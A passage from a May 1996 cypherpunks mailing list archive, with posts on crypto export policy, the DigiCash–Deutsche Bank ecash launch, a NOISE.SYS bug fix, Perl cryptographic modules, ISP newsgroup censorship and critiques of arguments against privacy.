if all the people on a given suburban block want some sort of low-cost, 
alternative method to access networks, they should be able to install some 
sort of centralized switchbox and run the cabling themselves down their back 
fence.  Where is industry on this sort of thing?  Why can't we buy such a 
thing?

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Tue, 7 May 1996 17:43:37 +0800
To: cyberdawg@AUSTIN.sig.net
Subject: clambake
Message-ID: <199605070410.VAA00280@well.com>
MIME-Version: 1.0
Content-Type: text


Electronic Frontiers Forum, Thursday, May 9
Join Jerod Pore, keeper of the electronic Factsheet Five and way informed 
observer of the Church of Scientology's Internet bucket brigade, for an 
informal clambake around the virtual campfire.  Those waves keep rollin' 
in... you can hear the ocean roar... 

***
Access info:
Chats are at 7PM PDT Each Thursday
Electronic Frontiers Forum at Club Wired, HotWired
http://www.hotwired.com/eff

Access to the Electronic Frontiers Forum in Club Wired at HotWired is by 
telnet to chat.wired.com:2428, or you can go to 
http://www.hotwired.com/club and click on "Enter Club Wired."

The Electronic Frontiers Forum is on channel 03 (Cafe Wired).

A login is required, but free and easy to get (go to
http://www.hotwired.com/reception/form.html).


-- 

Jon Lebkowsky <jonl@wired.com>                     http://www.well.com/~jonl
Electronic Frontiers Forum, 7PM PST Thursdays  <http://www.hotwired.com/eff>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 7 May 1996 18:13:54 +0800
To: "Declan B. McCullagh" <cypherpunks@toad.com
Subject: Re: The FBI/NSA's new escrow argument, DC crypto panel
Message-ID: <m0uGeL8-00093iC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:46 PM 5/6/96 -0400, Declan B. McCullagh wrote:
>I just came back from the Online Services Industry conference held today
>in Washington, DC at the Georgetown Four Seasons. It was very much a DC
>thing, organized by Congressmen Jack Fields and Rick White (of the
>Internet Caucus).
>
>The fourth panel was "Law Enforcement and Encryption in Cyberspace,"
>with this set of characters:
>
> * Edward Allen, supervisory special agent/section chief, FBI
> * Clinton Brooks, advisor to the director, NSA
> * Dorothy Denning, professor, Georgetown University
> * Bruce Heiman, attorney, Preston Gates Ellis & Rouvelas Meeds
> * Jim Lucier, director of economic research, Americans for Tax Reform
> * Marc Rotenberg, director, EPIC

>The FBI's Allen said: "We have talked to our foreign law enforcement
>counterparts who are concerned with exporting strong crypto. Crime is
>increasing internationally... There is not an international free market
>for crypto. To a great degree, other nations have been relying on U.S.
>export controls to maintain stasis. What bothers me about efforts being
>proposed legally is that we're moving forward without understanding what
>we're getting into... The efforts can go to order or chaos. We're in a
>period where it could go to chaos."

Maybe there's a sort of backhanded solution to this.  I recall the story 
that, in the early 1970's, it was sport in MIT's AI Labs to try to crash the 
Unix computer.  More and more protections were added, which eventually were 
worked around with more failures.  Eventually, they found a beautiful 
solution:  Add a command to the operating system, "Crash the computer!" 
which did exactly this.  Suddenly, this goal became devalued, and nobody 
wanted to crash the computer anymore.

Okay, what if a foreign distributor (very tiny, perhaps) was set up that 
loudly proclaimed that it would sell any crypto only legally available in 
the US, but had been smuggled out by people unknown and sent to it 
anonymously.  (It would verify the genuineness by sending it back into the 
US, for verification, etc.)  It announces that it is pleased to sell to 
everybody ESPECIALLY "terrorists, child-pornographers, drug smugglers, and 
other criminals."   To keep from angering the software writers themselves, 
it would pay appropriate royalties to those whose works they had sold, but 
obviously they wouldn't ask permission to do this.

At that point, any argument against the export of such software will fail, 
because the software already has a willing supplier overseas.  Yes, this is 
the way it already it, sorta, but the difference is that there is nobody who 
enthusiastically claims that this is exactly what they're doing.  
Representatives of such a distributor can be called upon to appear at any 
debates, hearings, or other activities in order to spoil the arguments of 
Denning et al.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephan Somogyi <somogyi@digmedia.com>
Date: Tue, 7 May 1996 17:25:43 +0800
To: cypherpunks@toad.com
Subject: WhoWhere Robot?
Message-ID: <v03006b0aadb482c06662@[198.93.25.98]>
MIME-Version: 1.0
Content-Type: text/plain


My web server was just hit by a machine that reverse-resolved to a
Japanese academic domain with an agent claiming to be "WhoWhere Robot";
this bot is not listed in the
<http://info.webcrawler.com/mak/projects/robots/active.html> List of
Robots.

Does anyone know whether this has any relationship to the
www.whowhere.com people?

________________________________________________________________________
Stephan Somogyi                Mr Gyroscope                Digital Media






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 7 May 1996 17:20:51 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: alias servers  (al la alias.c2.org)
Message-ID: <199605070519.WAA13048@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>>Of course, having just previewed the Juno "free-email"
>>service, I might count it also.
>
>	How much information do they actually want, and how much do they
>check? I seem to recall that they wanted some info for giving to the
>advertisers and for targeting the advertising.

They don't want that much information, nor do they really check it;
the big thing they're doing is sending you advertisements
and probably selling your name, but they may have privacy policies.
The big negative about using them as alias servers is that you have
to use _their_ software and dial up to them; you can't get your mail
by POP (though you can argue that it's harder to trace that way),
and you have to use their silly advertisement-displaying user interface
(shades of Prodigy!).  I assume that behind their silly interface
is a standard network protocol, which somebody can decipher and
figure out how to use SLIP or PPP or X.3/X.28/X.29 or whatever instead.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <alex@proust.suba.com>
Date: Tue, 7 May 1996 16:58:40 +0800
To: cypherpunks@toad.com
Subject: fixing netscape
Message-ID: <199605070349.WAA01122@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


http://reality.sgi.com/grafica/framefree

This doesn't have any direct crypto relevance -- it's a program that
improves navigator binaries by modifying them so they won't understand
frames. 

I'm a little surprised that we didn't think of this when we were waiting
for Jeff to allow us to turn off javascript. 

--
Alex Strasheim, alex@proust.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shabbir@vtw.org (Shabbir J. Safdar)
Date: Tue, 7 May 1996 16:31:42 +0800
To: cypherpunks@toad.com
Subject: INFO: Transcript of crypto chat with Sen. Burns at www.crypto.com
Message-ID: <199605070252.WAA08448@panix3.panix.com>
MIME-Version: 1.0
Content-Type: text/plain


------
========================================================================
   __     _________        __	
   \ \   / /_   _\ \      / /	Voters Telecommunications Watch
    \ \ / /  | |  \ \ /\ / / 	        (vtw@vtw.org)
     \ V /   | |   \ V  V /  		 May 6, 1996
      \_/    |_|    \_/\_/   	Redistribute only until 5/28/96

      TRANSCRIPT OF ONLINE CHAT WITH SENATOR BURNS (R-MT) AVAILABLE
      AT ENCRYPTION POLICY RESOURCE CENTER (HTTP://WWW.CRYPTO.COM)

            SENATOR BURNS IS SCHEDULED TO APPEAR AT HOTWIRED:
		        MONDAY 5/13/96 9PM EST

      Please widely redistribute this document with this banner intact
			    until May 28, 1996

________________________________________________________________________
CONTENTS
	The Latest News
	Schedule of upcoming chats related to encryption
	About VTW and Whistlestop96

________________________________________________________________________
THE LATEST NEWS

Senator Burns went online tonight and discussed encryption and his
new bill, PRO-CODE, with Internet users in America Online's News Room
auditorium.  The full transcript of this session is available at
http://www.crypto.com/.  Some highlights from the fifty minute discussion:

Question   : Senator Burns, As a small business in Montana that provides
  	     web-space to local Montana businesses, I'm concerned that the
	     lack of privacy and security on the Net will keep many of my 
	     potential customers from purchasing online. How will this bill
	     help?
Sen Burns  : That's exactly why I introduced this bill. Right now I don't
	     think any of us feel safe transmitting our credit card numbers
	     over the Internet, and many companies who have workers around
	     the nation or world are worried about how they can safely send
	     sensitive information back and forth between them. If we can
	     raise their level of security, we can guarantee that that
	     information will be sent without unwanted eyes looking in.



Question   : What do you think the Administration, FBI, and NSA reaction
	     to your bill will be? Have you already heard from them? (I run
	     an ISP in Missoula, Montana.)
Sen Burns  : We expect them to have some concern with this, and we will work
	     with them but we have to undertsnad that the people we are 
             concerned with can already gain encryption that is already
	     longer than 40 bits on teh international market.

The transcript is the property of America Online, who retains the copyright.

________________________________________________________________________
SCHEDULE OF UPCOMING CHATS RELATED TO ENCRYPTION

Sen. Burns
	Hotwired: Monday May 13, 9pm EST

Sen. Leahy
	America Online: date not yet available
	Hotwired: date not yet available

You can connect to AOL over the Internet through a SLIP/PPP connection or
by dialing up one of their services.  Download the AOL client software from
URL:ftp://ftp.aol.com/ and install it.

HotWired's Club Wired is easy to reach. Go to the WWW page
URL:http://www.hotwired.com/club/ and follow the instructions.

________________________________________________________________________
ABOUT VTW AND WHISTLESTOP96

VTW (Voters Telecommunications Watch) is an Internet-based grass-roots
advocacy group concentrating on issues of civil liberties and
telecommunications.  Whistlestop96 is VTW's project to bring more
members of Congress and Congressional candidates to online chats to talk
about core Internet issues with net users.

We do not accept unsolicited donations at this time.  If you want to help,
register to vote at URL:http://www.vtw.org/ivoter/ .

For more information on encryption policy, please see the following
resources:
	Encryption Policy Resource Page: http://www.crypto.com/
	Internet Privacy Coalition: http://www.privacy.org/

...run by these fine organizations:
	Center for Democracy and Technology: http://www.cdt.org/
	Electronic Frontier Foundation: http://www.eff.org/
	Electronic Privacy Information Center: http://www.epic.org/
	Voters Telecommunications Watch: http://www.vtw.org/ 

________________________________________________________________________
      Copyright 1994-1996, Voters Telecommunications Watch
========================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@UNiX.asb.com (Mutatis Mutantdis)
Date: Tue, 7 May 1996 14:24:00 +0800
To: cypherpunks@toad.com
Subject: Bug in NOISE.SYS v0.5.5 w/fix...
Message-ID: <199605062324.TAA08083@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



There's a bug in the API in NOISE.SYS v0.5.5. I've uploaded a fix as
noise056.zip to ftp.funet.fi, so keep an eye out for it.

The fix is easy. In the file "multiplex.inc" you'll see the  @ReturnOk LABEL
where it restores the ds, si and bp registers... at the @ReturnErr hook it
only fixes the ds and si registers. Add a "pop bp" appropriately and remake
the file.

Sorry for the inconvenience.

--Rob







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Tue, 7 May 1996 16:27:47 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Police tactics question
In-Reply-To: <01I4E2S0NTES8Y583T@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.91.960506232325.15570D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


One of my students has written a paper that may answer some of your 
questions,  Online Stings: High Tech Entrapment or Innovative Law 
Enforcement?, by  Jeffrey D. Weinstock
http://www.law.miami.edu/~froomkin/seminar/papers/weinstock.htm

other student papers on Internet topics can be found at:

http://www.law.miami.edu/~froomkin/seminar/papers/

Note:  these are *student* papers.  Not everything in them is exactly right.
And no, I won't tell you their grades.

On Mon, 6 May 1996, E. ALLEN SMITH wrote:

> 	I've often heard of the police/postmaster mailing someone child
> pornography prior to going in and busting them for possession of it. What are
> the legal matters in such cases?
> 	Thanks,
> 	-Allen
> 

[The above may have been dictated with Dragon Dictate/Win 2.01 voice 
recognition. Be alert for unintentional strange word substitutions.]

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 7 May 1996 19:24:45 +0800
To: Alex Strasheim <alex@proust.suba.com>
Subject: Re: fixing netscape
Message-ID: <199605070634.XAA14016@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:49 PM 5/6/96 -0500, you wrote:
>http://reality.sgi.com/grafica/framefree
>
>This doesn't have any direct crypto relevance -- it's a program
>that improves navigator binaries by modifying them so they won't
>understand frames.  I'm a little surprised that we didn't think 
>of this when we were waiting for Jeff to allow us to turn off 
>javascript. 

Ouch - that's a slightly scary piece of code, though it should
probably work ok if you get the details correct for your operating
system.  It patches the binary to xxxxxx out the strings "frameset" and 
"noframes"; I suppose you could do something similar to kill Java.
I'd been expecting maybe a web proxy that would eat frame requests,
which could be adapted to kill of Javascripts as well.
#					Thanks;  Bill
# Bill Stewart, stewarts@ix.netcom.com, +1-415-442-2215
# goodtimes signature virus innoculation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 7 May 1996 17:39:16 +0800
To: cypherpunks@toad.com
Subject: Press Release: Ecash to be Issued by Deutsche Bank
Message-ID: <v03006604adb4762ce69e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Tue, 7 May 1996 00:25:44 +0200
From: press@digicash.com
To: ecash@digicash.com
Subject: Press Release: Ecash to be Issued by Deutsche Bank
Sender: owner-ecash@digicash.com
Precedence: bulk

Please find attached today's press release on our cooperation with
Deutsche Bank. If you need any further information, please contact
us at: press@digicash.com

Kindest regards,

Paul Dinnissen
DigiCash BV

--------------------------- PRESS RELEASE ---------------------------

Release date:
Tuesday, May 7, 1996
Amsterdam, The Netherlands

          ==============================================
          DigiCash's Ecash to be Issued by Deutsche Bank
          ==============================================

    DigiCash and Deutsche Bank are to launch a joint pilot project to
test the use of electronic cash on the Internet. This will enable
Deutsche Bank's clients to pay for information (ranging from magazine
articles to stock quotes), services (from database searches to help
desk support) and tangible goods (from mail order to pizzas) using
any personal computer with access to the Internet. This new service
will provide merchants and even private individuals with the
solutions needed for doing business on the Internet.

    The project's technology is based on the ecash system, which won
DigiCash the European Commission's 1995 Information Technology
European Award (ITEA'95) for innovative technology. Ecash has been
tested for several years and was used last autumn to issue the first
ecash dollars in the USA.

    Apart from a PC, users do not need any special hardware or cards.
They simply connect to Deutsche Bank's Internet site and download
digital ecash coins onto their PC's hard disk, thereby debiting their
accounts. These coins can later be used as needed to pay on the
Internet withby a single mouse-click.

    "In launching this pilot project, Deutsche Bank aims to test the
possibilities of innovative payment forms and procedures and to
expand their range of Internet services" says Dr. Wolfgang Johannsen,
Head of Deutsche Bank's Department for Technological Development.

    "Ecash is a digital form of cash that works on the Internet where
paper cash can't" according to Dr. David Chaum, founder and CEO of
DigiCash. "Like cash, it offers consumers true privacy in what they
buy. Yet, users can always recover their money if their computer
crashes, and also prove who received their electronic cash in
payment, making it unsuitable for criminal use. Thus ecash brings an
improved form of cash to cyberspace, where it can be expected to
catalyze an enormous growth in electronic commerce."

    DigiCash and Deutsche Bank see this launch as a major step
towards the adoption of true electronic cash on the Internet.

Contact DigiCash Amsterdam:       Contact Deutsche Bank:
Mr. Paul Dinnissen                Mr. Schumacher / Mr. Thoma
Tel: +31 20 665 2611              Tel: +49 69 910 33406 / 33405
Fax: +31 20 665 1126              Fax: +49 69 910 33422 / 38689
email: press@digicash.com
http://www.digicash.com/          http://www.deutsche-bank.de/

          (DigiCash and ecash are registered trademarks
            and should always be referred to as such)

                               * * *

                       DigiCash Backgrounder
                       =====================

History and Mission
-------------------

    Since beginning operation in April 1990, DigiCash's mission and
primary activity has been: to develop and license payment technology
products--chip card, software only, and hybrid--that both show the
true capability of technology to protect the interests of all
participants and are competitive in the market.

Founder
-------

    Dr. David Chaum, managing director of DigiCash, received his
Ph.D. in Computer Science from the University of California at
Berkeley, then taught at New York University Graduate School of
Business Administration and at the University of California, and
headed the Cryptography Group at CWI, the Dutch nationally funded
center for research in mathematics and computer science, before
taking his current position. He has published over 45 original
technical articles on cryptography and also founded the International
Association for Cryptologic Research.

DigiCash Products
-----------------

    Blue: smart card technology for EMV & prepaid with dynamic public
key. Conforms to joint Europay, MasterCard, Visa specifications;
multiple applications, including loyalty and closed systems; superior
data integrity in case of malicious/accidental interference or
interruption; requires only the smallest and most proven chips, e.g.
SC-24 or ST601; mask technology licensing.

    CAFE: smart card and card-accepting electronic wallet project.
Consortium of 12 other members founded and chaired by Dr. Chaum of
DigiCash; simulation, mask and first readers developed by DigiCash;
technology trial at the EC headquarters building in participation
with related open special interest group and partially funded by the
EC.

    DyniCash: highway-speed road-toll collection system using smart
cards. Chip card inserts into battery-powered dashboard unit;
reflective backscatter microwave technology by industry leader
Amtech; prepaid mode has user privacy; open and/or closed pricing
schemes; tested extensively in Japan; non-exclusive licensing of the
payment technology.

    Ecash: software only electronic cash system for internet/email.
Users download software that can make and receive payments; protects
users' money like travellers checks and privacy like coins; now
operational after testing by over twenty thousand users world-wide;
Macintosh, MS-Windows and X-Windows; any WWW browser; currently Mark
Twain Bank currently issues ecash in US dollars and Mearita/EUnet
issues digital Finnish marks; Posten has announced their license and
intention to issue Swedish Kroner.

    Facility Card: complete facility management smart-card/reader
system. Cash replacement, access control, and time/attendance system;
now in schools, hospitals, industry, offices, recreation; interfaces
to vending, point-of-sale, access control, copiers, phones, gaming;
downloadable & upgradeable readers work on-line and/or off-line; sold
through VAR's; over 100k cards in use in the Netherlands; Mars
Electronics International will launch it globally in 1996.


                          Ecash Backgrounder
                          ==================

How does ecash work?
--------------------

    Using ecash is likeas easy as using a virtual ATM (Automatic
Teller Machine). When you connect over the Internet and authenticate
your ownership of the account, you can withdraw money electronically.
Instead of giving you bank notes, you are given digital coins which
your software can store on your PC's hard disk.

    When you want to make a payment, you simply confirm the amount,
payee and description of goods, with a mouse click you tell your
ecash software to transfer coins of the correct value from your PC
direct to the payee.  Merchants, (ranging from casual participants in
the global Internet bazaar to mega-retailers) can then deposit the
digital coins into their ecash accounts.

    Behind the user interface, your computer actually creates
'serial' numbers for the electronic coins based on a random `seed'.
Then it hides them in special encryption `envelopes', sends them to
the electronic bank for `signature' and, when they are returned,
removes the `envelopes' (retaining the bank's validating digital
signature on the `serial' numbers). This way, when the bank
(eventually) receives your coins, it cannot recognize them as coming
from any particular withdrawal or account, because all coins are
hidden from the bank during the withdrawal process. Therefore the
bank cannot know when or where you shop, who you pay or what you buy.

    The `serial' number' of each signed coin is unique, so that the
bank can be sure that it never accepts the same coin twice. If you
wish to identify the recipient of any of your payments, you may
reveal the unique coin number and use your ecash software to prove
that you created it and get the bank to confirm who deposited it.
Your software can also re-create the `serial' numbers and `envelopes'
from the `seed' that you wrote down when installing your account,
thereby allowing all your coins to be re-created if your PC fails.


How safe is ecash?
------------------

    Security is fundamental to electronic cash. The cryptographic
coding that protects every 5 cent ecash payment is the same as that
routinely relied upon for authenticating requests to move huge sums
between banks and even for national security. But in principle ecash
goes beyond such communications security to achieve true multiparty
security: no one (buyer, seller, bank) can cheat anyone else, no
matter how they might modify their own software. Even if two parties
collude, they cannot cheat the third.

    Replacing paper and coins with ecash would make life much harder
for criminals. Because the payer's computer chooses the `serial'
numbers of the coins (as mentioned above), he or she can later
irrefutably identify blackmarketeers, extortionists, and acceptors of
bribes--were they to accept ecash. Paper notes, briefcases full of
which can be passed from hand to hand without leaving any record,
allow money laundering and tax evasion today. With ecash, however,
all the amounts each person receives are known to their bank.
Significant criminal activity could thus be thwarted by completely
replacing paper money; moreover, the privacy whichof ecash offers
would be essential to widespread acceptance of any electronic payment
system.

------------------------- END PRESS RELEASE -------------------------

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 7 May 1996 17:27:55 +0800
To: "Declan B. McCullagh" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Police tactics question
In-Reply-To: <01I4E2S0NTES8Y583T@mbcl.rutgers.edu>
Message-ID: <v03006608adb4776a3143@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:09 PM  -0400 5/6/96, Declan B. McCullagh wrote:
> According to Bruce "Comstock was an amateur" Taylor, it's only legal for

No, no, no, no, no.... It's Bruce "Penis with a Blister" Taylor. Remember?

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://thumper.vmeng.com/pub/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Tue, 7 May 1996 14:14:57 +0800
To: cypherpunks@toad.com
Subject: Announce: Cryptographic extensions for Perl
Message-ID: <199605062209.AAA24372@internal-mail.systemics.com>
MIME-Version: 1.0
Content-Type: text/plain



                       CRYPTOGRAPHIC EXTENSIONS FOR PERL
                                       
   
     _________________________________________________________________
   
                                  DESCRIPTION
                                       
   This library contains a suite of cryptographic extensions for Perl.
   Also included are some extensions that have a cryptographic relevance,
   such as the Compress::Zlib modules, and the TrulyRandom module.
   
   These modules have been developed as extensions for performance
   reasons.

   Now available for download at http://www.systemics.com/software/

   
                                   FEATURES
                                       
   All of the following have been implemented as Perl extensions in C:
     * BigInteger module (based on code from Eric Young). 
       This module implements arbitrary length integers and some
       associated mathematical functions.
     * Compress::Zlib module (by Paul Marquess).
       A Perl interface to Jean-loup Gailly's and Mark Adler's info-zip
       zlib compression library.
     * Crypt::DES module (DES implementation by Eric Young). 
     * Crypt::IDEA module. 
     * Crypt::MD5 module (by Neil Winton and Data Security, Inc.) 
     * Crypt::PRSG - Pseudo random sequence generator 
       This module implements a 160 bit LFSR for use in generating pseudo
       random sequences.
     * Crypt::SHA module (by Uwe Hollerbach and based on code from NIST
       and Peter C. Gutmann) 
     * Utils::TrulyRandom module, based on code from Don Mitchell and
       Matt Blaze (AT&T). 
       This module generates "truly random" numbers, based on interrupt
       timing discrepancies.
       
                                   COPYRIGHT
                                       
   This library includes (or is derived from) software developed by (and
   owned by) the following:
     * Jean-loup Gailly and Mark Adler
     * Peter C. Gutmann
     * Uwe Hollerbach <uh@alumni.caltech.edu>
     * Paul Marquess <pmarquess@bfsec.bt.co.uk>
     * Don Mitchell and Matt Blaze (AT&T)
     * NIST
     * RSA Data Security, Inc.
     * Systemics Ltd <http://www.systemics.com/>
     * Neil Winton <N.Winton@axion.bt.co.uk>
     * Eric Young <eay@mincom.oz.au>




   Also planned for release:

	 * Cryptographic library for Perl
	 * PGP library for Perl
	 * Cryptographic extensions for Java (native code)
	 * Cryptographic library for Java
	 * PGP library for Java





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Tue, 7 May 1996 18:13:59 +0800
To: cypherpunks@toad.com
Subject: Re: UK IP Censorship
In-Reply-To: <Pine.GUL.3.93.960506175254.5643C-100000@Networking.Stanford.EDU>
Message-ID: <FNJJND59w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Rich Graves <llurch@networking.stanford.edu> writes:
> On Mon, 6 May 1996 anonymous-remailer@shell.portal.com wrote:
> > Pipex - the UK arm of UUNet of the US - does not expect a
> > backlash from users over the censorship.
>
> Let's see to it that they're wrong.
>
> [ObFUCKING-STATIST: while the article is newbiegarbled, as far as I can
> tell, they're only blocking specific newsgroups, and not any IP routes,
> which would be worse. IMO, ISPs have the right to block certain
> newsgroups, as long as they tell customers what they're doing. HOWEVER, if
> Pipex is as big an uber-ISP and news feeder of ISPs as UUNet is here, then
> they've clearly gone over the line as far as I'm concerned. I don't care
> if AOL blocks alt.sex.kiddie-porn, because the kiddie-porners can simply
> move to a real ISP; but the big players have more of an obligation to act
> as content-neutral common carriers.]

UUNET in the US also blocks Usenet newsgroups it doesn't like.  They're real
unethical and dishonorable scumbags. Should we invent a protocol to encrypt the
Newsgroups: header and hide the newsgroups that David Lawrence (spit) censors?
:-)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 7 May 1996 19:27:58 +0800
To: Paul Penrod <furballs@netcom.com>
Subject: Re: Arguments _against_ privacy, anyone?
Message-ID: <199605070529.WAA25038@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



Date:    Sun, 21 Apr 1996 15:58:03 -0700 (PDT)

***where do some of these people get off the bus?


>From:    Phil Agre <pagre@weber.ucsd.edu>
Subject: Call for bad arguments against privacy

  * "We've lost so much of our privacy anyway."

	***and that justifies stripping you of the rest, correct?

  * "Privacy is an obsolete Victorian hang-up."

	***arrest that man for public nudity!

  * "Ideas about privacy are culturally specific and it is thus
     impossible to define privacy in the law without bias."

	***let me ask you, boy, just what the fuck you mean?

  * "We have strong security on our data."

	***yawn...

  * "National identity cards protect privacy by improving
     authentication and data security."

	***you must like to mutilate your body when they insert the chip?

  * "Informational privacy can be protected by converting it into
     a property right."

	***yes, if you not consider that the concept of property rights, 
		i.e. title, must be defined byins contents?

  * "We have to balance privacy against industry concerns."

	***what's good for General Motors is good for the country.

  * "Privacy paranoids want to turn back the technological clock."

	***yes, number 4078956898346, your comment has been registered.

  * "Most people are privacy pragmatists who can be trusted to make
     intelligent trade-offs between functionality and privacy."

	***yes, just like people are inherently good, unless the 
		issue is money.

  * "Our lives will inevitably become visible to others, so the
     real issue is mutual visibility, achieving a balance of power
     by enabling us to watch the people who are watching us."

	***yes, you do not throw stones at others who live in glass houses.

  * "Once you really analyze it, the concept of privacy is so
     nebulous that it provides no useful guidance for action."

	***oh, it is better that government take no action???

  * "People *want* these systems, as indicated by the percentage
     of them who sign up for them once they become available."

	***dale carnegie: will you ever quit selling your ideas!

  * "Concern for privacy is anti-social and obstructs the building
     of a democratic society."

	***aaaah, taxation by representation?

  * "Privacy regulation is just one more category of government
     interference in the market, which after all is much better
     at weighing individuals' relative preferences for privacy
     and everything else than bureaucratic rules could ever be."

	***huuh?

  * "There's no privacy in public."

	***no? try screaming 'rape' in NYC

  * "We favor limited access."

	***to just the thought police?

  * "Privacy in these systems has not emerged as a national issue."



--
Overseeing first-rate programmers is a managerial challenge 
  roughly comparable to herding cats.

cc: Cypherpunks <cypherpunks@toad.com>
    Phil Agre <pagre@weber.ucsd.edu>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 7 May 1996 19:28:20 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Why Leahy is No Friend of Ours
Message-ID: <199605070529.WAA25075@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Addressed to: E. ALLEN SMITH <EALLENSMITH@ocelot.Rutgers.EDU>
              Cypherpunks <cypherpunks@toad.com>

** Reply to note from E. ALLEN SMITH <EALLENSMITH@ocelot.Rutgers.EDU> 05/06/96  8:47pm       
= To: attila@primenet.com 
=  
= From:	IN%"attila@primenet.com"  "attila"  5-MAY-1996 21:36:54.93 
=  
= >        how many _truly_ "populist" presidents have we elected?  
=  
=  SMITH: 
= 	Given the numbers of times that a democracy has done more harm than 
= good to civil liberties (Prohibition, the election of Islamic Fundamentalists 
= in Algeria, etcetera), we don't _want_ a "populist"/demagogue president. We 
= want someone in charge (to whatever degree that someone has to be in charge) 
= who will respect civil liberties. The masses aren't going to elect such a 
= person; they prefer protection to liberty and always will. 
=  
= ATTILA: 
 
	democracy is _never_ the ideal government. the difference in the
    American government is that it is a _republic_.  the problem with a 
    republic in the techno age is that the press and/or advertising 
    creates the images --and can be bought, stolen, coerced, etc.

        my intent is to "lament" that the American voters do not 
    influence the choice of candidates --who are vetted my money, or 
    money's interests. 

        most mat not wish to consider the hidden importance of the CFR 
    and related groups --it is not a conspiracy; it is just another
    group with an agenda --except they have the money and influence to
    _buy_ the agenda over time --amd on their schedule.
 
 
= >  ATTILA: 
= >           "They that give up essential liberty to obtain a little  
= >               temporary safety deserve neither liberty nor safety." 
= >                        --Ben Franklin (Historical Review of PA -1759) 
= > 
= >    and, the bottom line is: 
= > 
= >              "It is not the function of our Government to keep the citizen 
= >                  from falling into error;  
= >               it is the function of the citizen to keep the Government  
= >                  from falling into error." 
= >                             --Robert H. Jackson (1892-1954), U.S. Judge 
=  
= 	Quite. 
= 	-Allen

--
Overseeing first-rate programmers is a managerial challenge 
  roughly comparable to herding cats.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 7 May 1996 20:15:27 +0800
To: Paul Penrod <furballs@netcom.com>
Subject: Re: Arguments _against_ privacy, anyone?
Message-ID: <199605070532.WAA28666@primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



Date:    Sun, 21 Apr 1996 15:58:03 -0700 (PDT)

***where do some of these people get off the bus?


>From:    Phil Agre <pagre@weber.ucsd.edu>
Subject: Call for bad arguments against privacy

  * "We've lost so much of our privacy anyway."

	***and that justifies stripping you of the rest, correct?

  * "Privacy is an obsolete Victorian hang-up."

	***arrest that man for public nudity!

  * "Ideas about privacy are culturally specific and it is thus
     impossible to define privacy in the law without bias."

	***let me ask you, boy, just what the fuck you mean?

  * "We have strong security on our data."

	***yawn...

  * "National identity cards protect privacy by improving
     authentication and data security."

	***you must like to mutilate your body when they insert the chip?

  * "Informational privacy can be protected by converting it into
     a property right."

	***yes, if you not consider that the concept of property rights, 
		i.e. title, must be defined byins contents?

  * "We have to balance privacy against industry concerns."

